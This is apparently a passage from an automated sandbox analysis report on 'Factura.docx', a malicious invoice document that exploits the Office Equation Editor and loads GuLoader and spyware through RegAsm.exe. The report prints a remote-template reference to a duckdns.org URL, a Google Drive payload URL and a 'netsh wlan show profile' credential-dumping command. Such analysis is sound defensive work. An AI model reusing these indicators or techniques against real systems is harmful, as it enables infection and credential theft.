            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
            Source: RegAsm.exe, 0000000A.00000003.1231204370.21E83000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
            Source: RegAsm.exe, 0000000A.00000003.1231057571.21E6B000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
            Source: RegAsm.exe, 0000000A.00000002.2611065418.1EA28000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.firmaprofesional.com0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.1231057571.21E6B000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
            Source: RegAsm.exe, 0000000A.00000003.1231217618.21E89000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
            Source: RegAsm.exe, 0000000A.00000003.1231194838.21E68000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
            Source: RegAsm.exe, 0000000A.00000003.1230976244.1EA68000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231194838.21E68000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3emi468v
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/mi
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://doc-0o-9g-docs.googleusercontent.com/s
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 0000000A.00000002.2608008151.00745000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/t
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15FWIGIVEMLCjev6bHz-C_jmPxVG59Qdm
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
            Source: RegAsm.exe, 0000000A.00000002.2612025443.1F6A3000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
            Source: RegAsm.exe, 0000000A.00000002.2612573630.21F0F000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
            Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_00072D93 NtSetInformationThread,10_2_00072D93
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_000729DC NtProtectVirtualMemory,10_2_000729DC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_00072DAF NtSetInformationThread,10_2_00072DAF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_00072DE1 NtSetInformationThread,10_2_00072DE1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0097B362 NtQuerySystemInformation,10_2_0097B362
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0097B331 NtQuerySystemInformation,10_2_0097B331
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0028CE3810_2_0028CE38
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0028B88810_2_0028B888
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0028C8E010_2_0028C8E0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0028E7F010_2_0028E7F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE81BE10_2_1DEE81BE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEAD2A10_2_1DEEAD2A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE790E10_2_1DEE790E
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE007010_2_1DEE0070
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEC44910_2_1DEEC449
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEBC2B10_2_1DEEBC2B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEF7E910_2_1DEEF7E9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE4FB010_2_1DEE4FB0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE575810_2_1DEE5758
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE0EC010_2_1DEE0EC0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE5A8010_2_1DEE5A80
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE25F610_2_1DEE25F6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEBDCC10_2_1DEEBDCC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEED93810_2_1DEED938
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE613010_2_1DEE6130
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE54C810_2_1DEE54C8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEBC7D10_2_1DEEBC7D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE7C4610_2_1DEE7C46
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE0EC010_2_1DEE0EC0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE000610_2_1DEE0006
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE8BD610_2_1DEE8BD6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEDFBE10_2_1DEEDFBE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE575210_2_1DEE5752
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE732610_2_1DEE7326
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE273710_2_1DEE2737
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE3EEF10_2_1DEE3EEF
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE2A7010_2_1DEE2A70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33063210_2_1E330632
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33255810_2_1E332558
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33289010_2_1E332890
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33007010_2_1E330070
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33254810_2_1E332548
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E33194E10_2_1E33194E
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E3316BC10_2_1E3316BC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5C001A10_2_1E5C001A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CE8C010_2_1E5CE8C0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CF0B010_2_1E5CF0B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CF51B10_2_1E5CF51B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CE8B010_2_1E5CE8B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CF4A710_2_1E5CF4A7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E5CF0A010_2_1E5CF0A0
            Source: regasm[1].exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: vbc.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCX@8/27@14/3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0097B1E6 AdjustTokenPrivileges,10_2_0097B1E6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0097B1AF AdjustTokenPrivileges,10_2_0097B1AF
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$actura.docxJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD362.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\vbc.exeSection loaded: C:\Windows\System32\msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vbc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Factura.docxVirustotal: Detection: 36%
            Source: Factura.docxMetadefender: Detection: 15%
            Source: Factura.docxReversingLabs: Detection: 29%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\vbc.exe'
            Source: unknownProcess created: C:\Windows\System32\netsh.exe 'netsh' wlan show profile
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\AppData\Roaming\vbc.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\netsh.exe 'netsh' wlan show profileJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
            Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000000A.00000002.2610434139.1E2C0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000A.00000002.2606953485.00070000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2316, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00402C23 push 8FB1657Fh; retf 8_2_00402C2B
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00404438 push cs; ret 8_2_0040443A
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_004024F5 push edi; retf 8_2_004024FF
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_004028BC push esi; retf 8_2_004028BD
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00401D6F push FFFFFFF2h; retf 8_2_00401D7A
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00404D70 push edx; retf 8_2_00404D71
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00403DE4 push ds; retf 8_2_00403DF9
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00404643 push 00000069h; retf 8_2_004046DD
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_0040424D push ds; ret 8_2_0040424E
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00404A8F push ss; ret 8_2_00404A96
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_0040229A push ebx; ret 8_2_004022A4
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_0040469C push 00000069h; retf 8_2_004046DD
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_00405B85 push ds; ret 8_2_00405B86
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F281D push eax; ret 8_2_001F281E
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F0274 pushfd ; ret 8_2_001F0277
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F28ED push eax; ret 8_2_001F28EE
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F0D0F pushfd ; ret 8_2_001F0D27
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F290D pushfd ; ret 8_2_001F290F
            Source: C:\Users\user\AppData\Roaming\vbc.exeCode function: 8_2_001F210A push FFFFFFF2h; ret 8_2_001F2114
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_002838B7 push esp; ret 10_2_002838CB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEA7C2 push FFFFFF9Eh; retf 10_2_1DEEA7C4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE4FA0 push eax; ret 10_2_1DEE4FA9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEEF353 push esi; retf 10_2_1DEEF36A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1DEE0725 push ebp; iretd 10_2_1DEE0728
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E331F51 push ss; retf 10_2_1E331F53
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E330D50 push E86BBF31h; ret 10_2_1E330D55
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E330F48 push E86BBF31h; retf 10_2_1E330F4D

            Persistence and Installation Behavior:

            barindex
            Contains an external reference to another documentShow sources
            Source: webSettings.xml.relsBinary or memory string: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/invoice_111334.doc" TargetMode="External"/>
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\vbc.exeJump to dropped file
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exeJump to dropped file

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft